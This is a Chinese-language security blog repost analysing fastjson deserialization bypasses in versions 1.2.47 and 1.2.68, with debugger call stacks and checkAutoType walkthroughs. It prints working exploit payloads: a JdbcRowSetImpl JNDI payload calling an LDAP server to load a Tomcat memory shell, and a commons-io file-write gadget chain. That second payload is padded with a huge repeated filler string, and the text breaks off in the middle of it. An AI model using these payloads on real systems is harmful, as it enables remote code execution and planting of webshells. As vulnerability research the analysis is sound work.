fastjson 浅谈
2022-9-30 17:36:54 Author: mp.weixin.qq.com(查看原文) 阅读量:35 收藏

fastjson历史简介

version<1.2.24   没有做任何限制,可以直接进行类的实例化和调用

1.2.25 - 1.2.47 checkAutoType来进行认证。默认为false,false的时候,先进行黑名单过滤,在进行白名单过滤(白名单匹配可以直接加载)。如果checkAutoType为true则白名单过滤,存在直接加载,然后再黑名单过滤。绕过规则主要是利用@type加载类的时候有限制(L [)利用其变形进行绕过

1.2.47以后,主要是利用缓存类进行加载。本文章主要是对1.2.47以后的一些加载机制做了解。同时复现1.2.80的常用的链子。

参考链接

https://github.com/su18/hack-fastjson-1.2.80https://www.cnblogs.com/zpchcbd/p/14969606.htmlhttps://hosch3n.github.io/2022/09/01/Fastjson1-2-80%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/https://y4er.com/posts/fastjson-1.2.80/https://b1ue.cn/archives/184.htmlhttps://paper.seebug.org/1236/https://mp.weixin.qq.com/s/m2U4zNkLCJvO3l1jChzeFw

1.fastjson1.2.47

import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;import jdk.nashorn.internal.parser.JSONParser;

public class demo {    public static void main(String[] args) {        String payload = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +                "\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1\",\"autoCommit\":true}}";        Object obj = JSON.parseObject(payload);        System.out.println(obj);    }}

下个断点再JdbcRowSetImpl#setdataSourceName,观察一下调用栈

setDataSourceName:4298, JdbcRowSetImpl (com.sun.rowset)deserialze:-1, FastjsonASMDeserializer_1_JdbcRowSetImpl (com.alibaba.fastjson.parser.deserializer)deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)parseObject:384, DefaultJSONParser (com.alibaba.fastjson.parser)parseObject:544, DefaultJSONParser (com.alibaba.fastjson.parser)parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)parse:1322, DefaultJSONParser (com.alibaba.fastjson.parser)parse:152, JSON (com.alibaba.fastjson)parse:162, JSON (com.alibaba.fastjson)parse:131, JSON (com.alibaba.fastjson)parseObject:223, JSON (com.alibaba.fastjson)main:10, demo

checkAutoType验证

ParserConfig#checkAutoType

代码量有点多,我就直接把关键点罗列出来

  1. typename为需要实例化的类

  2. typeName不为空

  3. 长度位于3-128之间

  4. 如果存在$,则将$替换为.

开启autotype的情况

未开启autotype的情况,往下走

其中在TypeUtils.getClassFromMapping(typeName)中,有以下类,fastjson会想要去从中寻找我们传入的类(Class)(此mapping主要是提供一些基础类,便于反序列化的时候提升效率) 

{java.awt.Color=class java.awt.Color, [char=class [C, java.lang.IllegalStateException=class java.lang.IllegalStateException, java.lang.IndexOutOfBoundsException=class java.lang.IndexOutOfBoundsException, java.sql.Time=class java.sql.Time, java.lang.NoSuchMethodException=class java.lang.NoSuchMethodException, java.util.Collections$EmptyMap=class java.util.Collections$EmptyMap, java.util.Date=class java.util.Date, java.awt.Point=class java.awt.Point, [boolean=class [Z, float=float, java.lang.AutoCloseable=interface java.lang.AutoCloseable, java.lang.NullPointerException=class java.lang.NullPointerException, java.lang.NoSuchFieldError=class java.lang.NoSuchFieldError, java.lang.NoSuchFieldException=class java.lang.NoSuchFieldException, java.util.concurrent.atomic.AtomicInteger=class java.util.concurrent.atomic.AtomicInteger, java.util.Locale=class java.util.Locale, java.lang.InstantiationException=class java.lang.InstantiationException, java.lang.InternalError=class java.lang.InternalError, java.lang.SecurityException=class java.lang.SecurityException, [int=class [I, [double=class [D, java.lang.Cloneable=interface java.lang.Cloneable, java.lang.IllegalAccessException=class java.lang.IllegalAccessException, java.util.IdentityHashMap=class java.util.IdentityHashMap, java.lang.LinkageError=class java.lang.LinkageError, double=double, byte=byte, java.awt.Font=class java.awt.Font, java.sql.Timestamp=class java.sql.Timestamp, java.util.concurrent.ConcurrentHashMap=class java.util.concurrent.ConcurrentHashMap, java.lang.StringIndexOutOfBoundsException=class java.lang.StringIndexOutOfBoundsException, java.util.UUID=class java.util.UUID, java.lang.Exception=class java.lang.Exception, java.lang.IllegalAccessError=class java.lang.IllegalAccessError, com.alibaba.fastjson.JSONObject=class com.alibaba.fastjson.JSONObject, java.lang.StackOverflowError=class java.lang.StackOverflowError, java.awt.Rectangle=class java.awt.Rectangle, [B=class [B, java.lang.TypeNotPresentException=class java.lang.TypeNotPresentException, [C=class [C, [D=class [D, java.text.SimpleDateFormat=class java.text.SimpleDateFormat, java.util.HashMap=class java.util.HashMap, [F=class [F, long=long, [I=class [I, java.util.TreeSet=class java.util.TreeSet, [short=class [S, [J=class [J, java.lang.VerifyError=class java.lang.VerifyError, java.util.LinkedHashMap=class java.util.LinkedHashMap, java.util.HashSet=class java.util.HashSet, java.lang.IllegalMonitorStateException=class java.lang.IllegalMonitorStateException, [byte=class [B, java.util.Calendar=class java.util.Calendar, [S=class [S, java.lang.StackTraceElement=class java.lang.StackTraceElement, java.lang.NoClassDefFoundError=class java.lang.NoClassDefFoundError, java.util.Hashtable=class java.util.Hashtable, java.util.WeakHashMap=class java.util.WeakHashMap, java.util.LinkedHashSet=class java.util.LinkedHashSet, [Z=class [Z, java.lang.NegativeArraySizeException=class java.lang.NegativeArraySizeException, java.lang.IllegalThreadStateException=class java.lang.IllegalThreadStateException, [long=class [J, java.lang.NoSuchMethodError=class java.lang.NoSuchMethodError, java.lang.NumberFormatException=class java.lang.NumberFormatException, java.lang.RuntimeException=class java.lang.RuntimeException, java.lang.IllegalArgumentException=class java.lang.IllegalArgumentException, int=int, java.sql.Date=class java.sql.Date, java.util.concurrent.TimeUnit=class java.util.concurrent.TimeUnit, java.util.concurrent.atomic.AtomicLong=class java.util.concurrent.atomic.AtomicLong, java.util.concurrent.ConcurrentSkipListMap=class java.util.concurrent.ConcurrentSkipListMap, boolean=boolean, java.util.concurrent.ConcurrentSkipListSet=class java.util.concurrent.ConcurrentSkipListSet, java.util.TreeMap=class java.util.TreeMap, java.lang.InstantiationError=class java.lang.InstantiationError, java.lang.InterruptedException=class java.lang.InterruptedException, [float=class [F, char=char, short=short, java.lang.Object=class java.lang.Object, java.util.BitSet=class java.util.BitSet, java.lang.OutOfMemoryError=class java.lang.OutOfMemoryError}

当没有获取到的时候,往下调用this.deserializers.findClass(typeName),也就是从buckets中去查询

buckets的作用暂时未知,但是我们能发现,如果没有开启autotype,再这两个中匹配到了合适的类,就会直接返回类的实例,相当于绕过了检测。

通过下面的流程,我们能发现调用的MiscCodec的deserialze()

此方法代码和处理逻辑如下

判断clazz的类型(是否为InetSocketAddress)

获取payload中的val参数,复制给objVal,在类型转换赋值给strVal

对clazz进行了一系列判断

调用TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader())进行加载

TypeUtils.loadClass,处理了L[;。同时当classloader不存在的时候,就会调用当前的classloader进行加载。由于catch为true,然后就会将当前类加入map缓存中。那也就是说,后续我们进行第二个poc的加载,就会直接绕过autotype的检测,直接从map中获取到对应的值。

fastjson1.2.68

之前对map缓存的绕过被禁用掉了,1.2.68主要是对期望类的绕过。重复的代码不做分析,主要来看有变化的地方。仍旧是checkautotype这里。

对传入的期望类做验证

判断白名单类,用的hahs匹配

当条件判断满足以后,就返回这个class

获取合适的反序列化器

(1)ThrowableDeserializer

当以上都没获取到,直接到这里,获取通过类型匹配,这里用的Exception,获取到了ThrowableDeserializer反序列化器

最终put到了buckets中

然后调用ThrowableDeserializer#deserialze中调用checkautotype,此时发现类被加载到了期望类中

(2)JavaBeanDeserializer

分析方式和上面一样的,不重复分析。

写文件payload 来源于https://zhuanlan.zhihu.com/p/376759650

import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;import jdk.nashorn.internal.parser.JSONParser;

public class demo {    public static void main(String[] args) {        String payload = "\n" +                "{\n" +                "  \"x\":{\n" +                "  \"@type\":\"com.alibaba.fastjson.JSONObject\",\n" +                "  \"input\":{\n" +                "  \"@type\":\"java.lang.AutoCloseable\",\n" +                "  \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\n" +                "  \"reader\":{\n" +                "  \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\n" +                "  \"charSequence\":{\"@type\":\"java.lang.String\"\"aaaaaa...aaaaaaaa...aaaaaa...aaaaaa...aaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa.aaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaa